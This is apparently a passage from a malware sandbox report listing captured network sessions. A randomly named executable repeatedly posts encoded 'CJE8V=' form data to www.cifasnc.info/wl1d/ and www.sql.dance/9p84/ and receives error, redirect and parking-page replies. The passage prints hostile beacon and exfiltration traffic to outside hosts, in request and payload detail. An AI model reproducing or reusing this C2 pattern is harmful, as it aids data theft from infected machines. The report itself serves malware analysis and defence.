                                                                                                      Data Raw: 43 4a 45 38 56 3d 61 74 38 33 45 56 77 42 6b 73 48 46 50 59 73 4a 6a 2f 7a 51 78 39 34 56 35 57 77 71 65 73 69 72 62 65 6c 2f 35 52 47 30 73 54 6d 63 71 4e 6a 55 42 57 6c 51 37 51 57 50 63 55 6b 51 53 6f 45 6a 51 34 70 4e 54 2f 58 69 7a 58 71 41 45 69 43 77 74 57 72 4f 61 64 62 49 38 77 6a 6e 74 45 6c 49 55 42 44 69 71 4c 50 37 69 48 7a 47 76 55 76 51 35 62 78 76 73 65 37 6c 50 5a 6a 71 44 6d 2f 4a 35 36 77 68 6b 44 58 39 65 74 79 5a 68 41 38 59 4f 7a 59 51 2b 47 31 4d 6c 43 39 6d 70 43 57 2b 79 46 36 62 31 7a 31 38 30 70 6f 51 69 6a 47 6c 57 71 2b 61 50 69 7a 33 34 4f 70 6f 47 71 33 4d 77 46 65 49 4a 63 61 51 33 79 4c 74 49 38 49 43 54 2f 53 43 6e 76 54 6a 39 43 71 74
                                                                                                      Data Ascii: CJE8V=at83EVwBksHFPYsJj/zQx94V5Wwqesirbel/5RG0sTmcqNjUBWlQ7QWPcUkQSoEjQ4pNT/XizXqAEiCwtWrOadbI8wjntElIUBDiqLP7iHzGvUvQ5bxvse7lPZjqDm/J56whkDX9etyZhA8YOzYQ+G1MlC9mpCW+yF6b1z180poQijGlWq+aPiz34OpoGq3MwFeIJcaQ3yLtI8ICT/SCnvTj9Cqt
                                                                                                      Dec 4, 2024 13:09:57.553250074 CET1236INHTTP/1.1 404 Not Found
                                                                                                      Date: Wed, 04 Dec 2024 12:09:57 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      x-pingback: http://cifasnc.info/xmlrpc.php
                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      last-modified: Wed, 04 Dec 2024 12:09:57 GMT
                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                      pragma: no-cache
                                                                                                      vary: Accept-Encoding,User-Agent
                                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wswr4lfsK7wYm1A%2BeG5PG0E9oWtyUFDue%2FOaVZV3AbXUHy9KfC35pTCP2Vc3aaTmhSAmMg2d1zJaBNjjQnQgyPkuC8UitQtnSg%2B14Qj8Tcr5ChsVW8ycqFDwTmPnUcraw4KG"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8ecbb0c4fc367c82-EWR
                                                                                                      Content-Encoding: gzip
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1908&min_rtt=1908&rtt_var=954&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=771&delivery_rate=0&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                      Data Raw: 35 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 5f 6f dc 36 0c 7f ce 01 f9 0e ac 0a e4 5a 6c 3e 27 6d b7 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec c3 0f 92 fc f7 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c e2 20 b4 48
                                                                                                      Data Ascii: 51eW_o6Zl>'mKAgYR$.zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L H
                                                                                                      Dec 4, 2024 13:09:57.553406000 CET1157INData Raw: 38 13 b7 a0 91 a7 44 69 59 32 8e 04 6a 8d 65 4a 6a 6b d5 9b 38 ae 1a 55 ad a4 ae e2 fb 52 c4 17 17 01 61 3c 64 ec 8e a3 a9 11 2d 01 bb 53 98 12 8b f7 36 ce 8d 21 d0 60 c1 68 4a 28 e7 7b 3a a7 96 c4 5b 15 e5 52 58 14 36 b6 35 36 68 e2 5b 54 68 63
                                                                                                      Data Ascii: 8DiY2jeJjk8URa<d-S6!`hJ({:[RX656h[Thcy!)oVJj4{{R2)bmw'N8oxD,R6k;|(a3o)q|PJ40L&rhVXuDT2 ,!,m0%


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      5192.168.2.849777172.67.128.1098060C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Dec 4, 2024 13:09:59.019768000 CET1788OUTPOST /wl1d/ HTTP/1.1
                                                                                                      Host: www.cifasnc.info
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=0
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 1242
                                                                                                      Origin: http://www.cifasnc.info
                                                                                                      Referer: http://www.cifasnc.info/wl1d/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174
                                                                                                      Data Raw: 43 4a 45 38 56 3d 61 74 38 33 45 56 77 42 6b 73 48 46 50 59 73 4a 6a 2f 7a 51 78 39 34 56 35 57 77 71 65 73 69 72 62 65 6c 2f 35 52 47 30 73 51 47 63 74 39 2f 55 42 78 35 51 36 51 57 50 57 30 6b 4e 53 6f 46 2f 51 35 4d 47 54 2f 62 59 7a 55 65 41 45 42 36 77 72 6e 72 4f 55 64 62 49 6a 67 6a 6d 70 45 6c 64 55 42 54 6d 71 4e 76 37 69 48 7a 47 76 57 33 51 74 61 78 76 68 2b 37 6b 47 35 6a 75 55 32 2f 6c 35 36 6f 58 6b 44 54 4c 65 65 36 5a 67 67 73 59 4a 42 67 51 6a 57 31 4f 6f 69 38 37 70 43 53 39 79 47 65 78 31 77 6f 68 30 72 34 51 68 31 54 45 53 49 57 59 65 51 6a 30 78 38 56 32 46 5a 48 52 39 6d 32 36 41 74 43 71 2f 53 54 4f 66 4b 51 78 64 49 62 54 79 4b 58 6f 77 6d 4b 74 68 5a 57 31 67 52 4b 51 2f 38 54 37 31 55 5a 6b 42 48 53 37 2b 6a 65 61 34 4c 78 37 6b 65 4d 58 46 36 31 65 72 77 44 72 36 33 63 77 73 75 32 56 79 6d 55 39 6e 6a 75 48 2f 48 76 6a 52 6d 72 38 4a 48 71 2f 35 45 39 48 42 31 43 79 42 7a 30 39 68 57 79 33 35 6e 4f 69 66 53 57 43 55 69 4f 74 54 65 70 4d 69 30 65 46 54 73 31 51 54 54 71 6a [TRUNCATED]
                                                                                                      Data Ascii: CJE8V=at83EVwBksHFPYsJj/zQx94V5Wwqesirbel/5RG0sQGct9/UBx5Q6QWPW0kNSoF/Q5MGT/bYzUeAEB6wrnrOUdbIjgjmpEldUBTmqNv7iHzGvW3Qtaxvh+7kG5juU2/l56oXkDTLee6ZggsYJBgQjW1Ooi87pCS9yGex1woh0r4Qh1TESIWYeQj0x8V2FZHR9m26AtCq/STOfKQxdIbTyKXowmKthZW1gRKQ/8T71UZkBHS7+jea4Lx7keMXF61erwDr63cwsu2VymU9njuH/HvjRmr8JHq/5E9HB1CyBz09hWy35nOifSWCUiOtTepMi0eFTs1QTTqjhPDcM9t9xqewSnQbYyoD0sG1a9lJocaUvhZSuZoINWfjCOhOsFXlgkTUzc1266kFLelD2ViIPYG8lXpcfqqmqHw6WmIJb+Wu65VCGWiwGRKu4P0C76RORGWbjVgR9pyj7EG0LNz0cTcNnOYMCbyYhVeBRAYTBvs/5PC0TXewl3JeBp6RSCt/u79rkdlq/TuVCjk+KG//0dWZIbYxjtWnAc+hCLTzM4/z/7kVQ/lyea1jXYQy2Qs4wQ6/K5YIgpIphII8cW/LmxxxX/grVlDUtFPYKhzZ/COmbCmRpKHjKHAHoMLTMvisaGL7XwZBoq4xt1cQ4Ebw0JbJx97Z/TCHZKncmLKXM/UjaoYrJ6P+Dn6/2FdZ3d048PfvwP1CpD8cFmvxLNQS2UYdufS70U6PAeCkC9L2RLm29AcYNY94y/Xtu8/R+7ZM9r9jrchpHAYc1uSJOaDtg5q1+zqNDxoOLOgbRugx0gtlRT31bbXqa/TfaBDUjTA2X/VgB4uaJ0hY1GRtK6gAO4pVndsgz7Mb0Ncd/92SK30jmmmhdUqiv2IBpoCc01Tr5BIuUGuIRmh1Qsejb3de4CPLtcw3TLK7dOt1z90I05rOQOCxjt7i3z5EDUIkDbZsE7JyVcnrzny6D9FwGYJk4RZOJMn6TN6QC3igdyiABTOMZo [TRUNCATED]
                                                                                                      Dec 4, 2024 13:10:00.253221989 CET1236INHTTP/1.1 404 Not Found
                                                                                                      Date: Wed, 04 Dec 2024 12:10:00 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      x-pingback: http://cifasnc.info/xmlrpc.php
                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      last-modified: Wed, 04 Dec 2024 12:10:00 GMT
                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                      pragma: no-cache
                                                                                                      vary: Accept-Encoding,User-Agent
                                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I2EAyYF26HOQOXyLZrJaXL%2BO0itnYrPq0Pm8olJjXXIBWaGdnjFau%2BtdSo48j%2B4BXqKYiU%2B9Ukd2ueXNJd0lq2J3dggC4o1b53gE%2B8NPIwrrsgqdp3kcr8djVmMOJ6iqstFV"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8ecbb0d58bf6efa3-EWR
                                                                                                      Content-Encoding: gzip
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1959&min_rtt=1959&rtt_var=979&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1788&delivery_rate=0&cwnd=111&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                      Data Raw: 35 31 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 5f 6f dc 36 0c 7f ce 01 f9 0e ac 0a e4 5a 6c 3e 27 6d b7 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec c3 0f 92 fc f7 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5
                                                                                                      Data Ascii: 512W_o6Zl>'mKAgYR$.zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#
                                                                                                      Dec 4, 2024 13:10:00.253374100 CET1167INData Raw: 4c e2 20 b4 48 38 13 b7 a0 91 a7 44 69 59 32 8e 04 6a 8d 65 4a 6a 6b d5 9b 38 ae 1a 55 ad a4 ae e2 fb 52 c4 17 17 01 61 3c 64 ec 8e a3 a9 11 2d 01 bb 53 98 12 8b f7 36 ce 8d 21 d0 60 c1 68 4a 28 e7 7b 3a a7 96 c4 5b 15 e5 52 58 14 36 b6 35 36 68
                                                                                                      Data Ascii: L H8DiY2jeJjk8URa<d-S6!`hJ({:[RX656h[Thcy!)oVJj4{{R2)bmw'N8oxD,R6k;|(a3o)q|PJ40L&rhVXuDT2 ,!,m


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      6192.168.2.849783172.67.128.1098060C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Dec 4, 2024 13:10:01.782880068 CET489OUTGET /wl1d/?CJE8V=XvUXHicd9bu/Gt5jzcf/yfRZ+nBfc8WBaOJ84C+StjmOhsjVLRYh1E2iBn46Z6pXP/d+KNfO4kCSPH2wqnfuXKL7xm74uEd7QDGj+trIsQHnhWbGvacQ1+C6F6CbLlCz6w==&-DiH=2XvD5 HTTP/1.1
                                                                                                      Host: www.cifasnc.info
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174
                                                                                                      Dec 4, 2024 13:10:02.988033056 CET1234INHTTP/1.1 301 Moved Permanently
                                                                                                      Date: Wed, 04 Dec 2024 12:10:02 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      x-pingback: http://cifasnc.info/xmlrpc.php
                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      last-modified: Wed, 04 Dec 2024 12:10:02 GMT
                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                      pragma: no-cache
                                                                                                      location: http://cifasnc.info/wl1d/?CJE8V=XvUXHicd9bu/Gt5jzcf/yfRZ+nBfc8WBaOJ84C+StjmOhsjVLRYh1E2iBn46Z6pXP/d+KNfO4kCSPH2wqnfuXKL7xm74uEd7QDGj+trIsQHnhWbGvacQ1+C6F6CbLlCz6w==&-DiH=2XvD5
                                                                                                      vary: User-Agent
                                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8wJgWEUgKpLsXwXtyKSI%2FXDpO6BvKQIsIe5GxPk%2BCo8avLK9SUwDlNUflQxJyPgLLCiSmAxyxU7UcwlIFLZbJENrE9hJay4tBrC5xrKGNxMpclBF%2BkTeAhDqZhz%2B4FfYLR%2Fi"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8ecbb0e69e37c427-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1591&rtt_var=795&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=489&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      7192.168.2.849800199.59.243.2278060C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Dec 4, 2024 13:10:09.077312946 CET742OUTPOST /9p84/ HTTP/1.1
                                                                                                      Host: www.sql.dance
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=0
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 206
                                                                                                      Origin: http://www.sql.dance
                                                                                                      Referer: http://www.sql.dance/9p84/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174
                                                                                                      Data Raw: 43 4a 45 38 56 3d 68 58 44 6e 5a 75 47 68 74 4b 5a 4f 78 61 49 49 4c 35 2b 71 36 65 37 48 53 37 47 6e 39 33 65 2f 33 69 4d 46 77 32 46 78 6d 4f 54 6b 45 32 7a 69 4f 43 6e 78 43 4c 58 38 65 73 54 71 58 42 37 70 71 64 65 52 2b 30 70 6a 63 74 42 74 54 74 37 32 6a 64 6c 75 49 4e 67 6f 4f 37 63 4d 4c 78 4f 34 75 4f 4e 34 4f 6e 4f 51 74 43 54 64 47 2f 49 49 41 41 4e 55 74 38 2b 6c 72 56 62 30 47 43 55 42 36 4e 39 35 66 32 4b 54 79 65 38 72 7a 56 78 33 32 63 6a 50 4f 65 48 6c 65 34 43 4c 7a 64 52 49 4e 42 6c 74 63 4c 4d 77 56 58 65 47 47 63 43 63 79 74 47 4b 72 71 6f 44 52 73 35 63 63 69 30 62 70 39 70 64 75 6b 4d 3d
                                                                                                      Data Ascii: CJE8V=hXDnZuGhtKZOxaIIL5+q6e7HS7Gn93e/3iMFw2FxmOTkE2ziOCnxCLX8esTqXB7pqdeR+0pjctBtTt72jdluINgoO7cMLxO4uON4OnOQtCTdG/IIAANUt8+lrVb0GCUB6N95f2KTye8rzVx32cjPOeHle4CLzdRINBltcLMwVXeGGcCcytGKrqoDRs5cci0bp9pdukM=
                                                                                                      Dec 4, 2024 13:10:10.198760033 CET1236INHTTP/1.1 200 OK
                                                                                                      date: Wed, 04 Dec 2024 12:10:09 GMT
                                                                                                      content-type: text/html; charset=utf-8
                                                                                                      content-length: 1102
                                                                                                      x-request-id: 92b19abf-4f76-4359-908d-73fc21cbfb1e
                                                                                                      cache-control: no-store, max-age=0
                                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_KW7KGAbhVYKpfk9+4Y7JKvZeDxWQ9VyfyZs49bTZ0NYrGOIQxJQYyT9QIaQCzy6UESVEacWJcjfeuo/K5qZlyA==
                                                                                                      set-cookie: parking_session=92b19abf-4f76-4359-908d-73fc21cbfb1e; expires=Wed, 04 Dec 2024 12:25:10 GMT; path=/
                                                                                                      connection: close
                                                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4b 57 37 4b 47 41 62 68 56 59 4b 70 66 6b 39 2b 34 59 37 4a 4b 76 5a 65 44 78 57 51 39 56 79 66 79 5a 73 34 39 62 54 5a 30 4e 59 72 47 4f 49 51 78 4a 51 59 79 54 39 51 49 61 51 43 7a 79 36 55 45 53 56 45 61 63 57 4a 63 6a 66 65 75 6f 2f 4b 35 71 5a 6c 79 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_KW7KGAbhVYKpfk9+4Y7JKvZeDxWQ9VyfyZs49bTZ0NYrGOIQxJQYyT9QIaQCzy6UESVEacWJcjfeuo/K5qZlyA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                      Dec 4, 2024 13:10:10.198893070 CET555INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTJiMTlhYmYtNGY3Ni00MzU5LTkwOGQtNzNmYzIxY2JmYjFlIiwicGFnZV90aW1lIjoxNzMzMzE0Mj


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      8192.168.2.849810199.59.243.2278060C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Dec 4, 2024 13:10:11.738704920 CET762OUTPOST /9p84/ HTTP/1.1
                                                                                                      Host: www.sql.dance
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=0
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 226
                                                                                                      Origin: http://www.sql.dance
                                                                                                      Referer: http://www.sql.dance/9p84/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174
                                                                                                      Data Raw: 43 4a 45 38 56 3d 68 58 44 6e 5a 75 47 68 74 4b 5a 4f 72 35 67 49 4d 5a 43 71 34 2b 37 45 64 62 47 6e 72 48 66 58 33 69 49 46 77 31 4a 62 6d 39 6e 6b 45 55 72 69 63 54 6e 78 46 4c 58 38 47 38 54 76 49 52 36 6e 71 64 6a 37 2b 32 74 6a 63 74 56 74 54 73 4c 32 6a 71 5a 74 4f 64 67 71 62 72 63 43 55 68 4f 34 75 4f 4e 34 4f 6e 61 71 74 43 4c 64 42 4b 59 49 41 6c 74 62 79 4d 2b 69 6f 56 62 30 4d 69 55 46 36 4e 39 48 66 79 72 47 79 63 30 72 7a 58 5a 33 31 4a 50 4d 45 65 48 38 44 49 44 71 31 75 41 6c 41 42 4a 33 64 4e 4d 6e 53 46 71 63 4b 4b 7a 32 6f 50 4f 4d 6f 71 41 6f 52 76 52 71 5a 56 70 7a 7a 65 35 74 77 7a 61 6c 54 47 4b 43 64 6b 4b 53 41 69 42 52 49 34 73 41 42 69 44 2f
                                                                                                      Data Ascii: CJE8V=hXDnZuGhtKZOr5gIMZCq4+7EdbGnrHfX3iIFw1Jbm9nkEUricTnxFLX8G8TvIR6nqdj7+2tjctVtTsL2jqZtOdgqbrcCUhO4uON4OnaqtCLdBKYIAltbyM+ioVb0MiUF6N9HfyrGyc0rzXZ31JPMEeH8DIDq1uAlABJ3dNMnSFqcKKz2oPOMoqAoRvRqZVpzze5twzalTGKCdkKSAiBRI4sABiD/
                                                                                                      Dec 4, 2024 13:10:12.872740030 CET1236INHTTP/1.1 200 OK
                                                                                                      date: Wed, 04 Dec 2024 12:10:12 GMT
                                                                                                      content-type: text/html; charset=utf-8
                                                                                                      content-length: 1102
                                                                                                      x-request-id: 320d044e-23f4-4406-99db-a375660147b3
                                                                                                      cache-control: no-store, max-age=0
                                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_KW7KGAbhVYKpfk9+4Y7JKvZeDxWQ9VyfyZs49bTZ0NYrGOIQxJQYyT9QIaQCzy6UESVEacWJcjfeuo/K5qZlyA==
                                                                                                      set-cookie: parking_session=320d044e-23f4-4406-99db-a375660147b3; expires=Wed, 04 Dec 2024 12:25:12 GMT; path=/
                                                                                                      connection: close
                                                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4b 57 37 4b 47 41 62 68 56 59 4b 70 66 6b 39 2b 34 59 37 4a 4b 76 5a 65 44 78 57 51 39 56 79 66 79 5a 73 34 39 62 54 5a 30 4e 59 72 47 4f 49 51 78 4a 51 59 79 54 39 51 49 61 51 43 7a 79 36 55 45 53 56 45 61 63 57 4a 63 6a 66 65 75 6f 2f 4b 35 71 5a 6c 79 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_KW7KGAbhVYKpfk9+4Y7JKvZeDxWQ9VyfyZs49bTZ0NYrGOIQxJQYyT9QIaQCzy6UESVEacWJcjfeuo/K5qZlyA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                      Dec 4, 2024 13:10:12.872919083 CET555INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
